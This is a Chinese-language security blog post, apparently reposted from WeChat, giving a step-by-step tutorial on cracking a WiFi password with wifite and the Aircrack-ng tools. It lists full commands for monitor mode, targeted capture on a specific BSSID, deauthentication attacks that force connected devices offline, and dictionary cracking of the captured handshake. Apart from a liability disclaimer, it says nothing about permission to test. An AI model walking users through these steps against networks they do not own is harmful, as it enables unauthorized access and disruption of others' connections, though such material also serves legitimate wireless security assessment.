免责声明
本公众号着重分享技术内容,所提供信息旨在促进技术交流。对于因信息使用而引起的任何损失,本公众号及作者概不负责。请谨慎行事,安全至上。
前言
-
wifite这款工具更加自动化,旨在简化渗透测试过程。它可以自动化执行多种攻击;比较易于使用,特别适合对无线网络安全性进行快速评估和测试的用户。 -
Aircrack-ng更像是一个工具集,提供了各种针对无线网络的工具,但需要用户手动执行和控制不同的步骤来执行渗透测试。Aircrack-ng则更加灵活和强大。 -
Aircrack-ng提供了更多的细粒度控制和更多的选项,可以执行更多不同类型的攻击,并且是一个完整的套件,包含了诸如airmon-ng(无线监控)、aireplay-ng(包重放攻击)、aircrack-ng(WEP和WPA-PSK破解)等多个工具。Wifite更专注于自动化执行攻击,对于快速测试网络安全性是一个很好的选择。
wifite介绍
Wifite是一款能够攻击多种无线加密方式(WEP/WPA/WPA2和WPS)的自动化工具,Wifite在运行之前需要提供几个参数,而Wifite将会自动帮我们完成所有的任务。它可以捕获WPA握手包,自动化去客户端验证,进行MAC地址欺骗,以及破解WiFi密码。
wifite使用:
1.执行wifite命令,开始扫描wifi,直到目标wifi出现停止扫描。
2. Ctrl+C 停止WIFI列表扫描 ;我要破解的wifi名字是vivo xbb,所以输入数字“1” 进行监听连接的数据包
3.监听到连接的数据包后,用wordlist-probable.txt里面的字典进行报破 。
4.很显然wordlist-probable.txt里的字典不够用,爆破失败!
5.准备玩下一款工具 Aircrack ;当然工具的设计思路大同小异,只需将字典把正确密码写入,也可爆破成功!
cd
/usr/share/dict/
ls
echo
"lilililili"
>> wordlist-probable.txt
#写入正确密码
Aircrack介绍
Aircrack-ng 是一个用于无线网络安全评估的强大工具集,主要用于评估Wi-Fi网络的安全性。它可以帮助安全研究人员和网络专家测试无线网络的弱点,用以改善网络的安全性。以下是Aircrack-ng工具集的一些主要组件和功能:
1. Aircrack-ng:
Aircrack-ng是Aircrack工具集的核心工具,用于破解Wi-Fi网络的WEP和WPA/WPA2-PSK加密。它可以通过捕获Wi-Fi流量,执行字典攻击或暴力攻击,尝试破解网络密码。
2. Airmon-ng:
Airmon-ng是一个用于配置无线网卡为监视模式(monitor mode)的工具。监视模式允许网卡捕获周围的所有Wi-Fi流量,包括数据包和控制包,而不仅仅是与连接相关的数据包。
3. Airodump-ng:
Airodump-ng是一个用于捕获Wi-Fi流量的嗅探器。它能够显示附近所有的Wi-Fi网络,并显示相关信息,包括BSSID(基本服务集标识符),信号强度,加密类型等。
4. Aireplay-ng:
Aireplay-ng用于生成和注入Wi-Fi流量。它可以被用来加速破解过程,通过向目标网络注入特定类型的数据包,引发目标网络产生更多的数据流量。
5. Airbase-ng:
Airbase-ng是一个虚拟接入点工具,可以创建一个虚拟Wi-Fi接入点,吸引周围的无线设备连接。这对于执行中间人攻击和其他安全评估任务非常有用。
6. Airtun-ng:
Airtun-ng是一个用于创建虚拟Tun/Tap接口的工具,它可以在两个物理网络之间建立一个加密的隧道连接,用于匿名和安全通信。
Airmon-ng:
1.先查看有没有无线网卡
iwconfig
#查看无线网络接口的信息
iwconfig wlan0
#wlan0代表无线网络接口名称,具体数字或字母根据系统不同而不同
airmon-ng
#查看有没有waln0无线网卡
2.如果是虚拟机中运行kali的话是不会识别到物理机的无线网卡的,需要去pdd买一个无线网卡去怼到电脑上去使用。
3.怼上无线网卡后执行命令iwconfig,成功的有了wlan0
4.把无线网卡设置为监听模式,才能去扫描到wifi
airmon-ng
start
wlan0
#把wlan0设置为监听
ifconfig
#wlan0没变为wlan0mon,这个具体看自己的网卡情况
airodump-ng:
1.开启无线网卡监听模式 airodump-ng wlan0
参数解析:
bssid
指定路由器的MAC地址
pwr
信号值,数字约大信号约强
CH
信道
ENC
加密方式
CIPHER
加密算法
AUTH
认证方式
wifi名字
2.执行完第一步后,找到了目标wifi(vivo xbb)
然后等待连接这个wifi的用户,有两个用户已经连接到了wifi
airodump-ng --bssid 4A:D9:BD:A4:99:74 -c 9 -w /home/kali/Desktop wlan0
--bssid :指定路由器的MAC地址
-c :指定信道(按照实际情况填写)
-w :指定抓取握手包存放的位置
aireplay-ng:
1.再打开一个终端,输入以下命令
aireplay-ng
-0
20
-a
路由器
MAC
-c
客户机
MAC
wlan0
aireplay-ng
-0
20
-a
4
A
:D9
:BD
:A4
:99
:74
-c
B2
:B2
:FF
:67
:AA
:73
wlan0
#用
airplay-ng
工具强制断开已经连接到
wifi
的设备重新连接路由器,来进行抓取挖手包
-0
:把链接的手机踢下线
-a
:指定路由器的
MAC
-c
:指定客户机的
MAC
2.之后返回airodump-ng第二步,发现成功抓取到握手包文件/Desktop-0.5cap的信息
Aircrack-ng:
用aircrack-ng结合字典去爆破,最后在6w多个密码中找到正确的密码"lilililili"
aircrack-ng -w
'/home/kali/Desktop/pass.txt'
'/home/kali/Desktop5.cap'
原文始发于微信公众号(大仙安全说):窥探无线网络:探秘两款神秘WiFi攻击利器
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论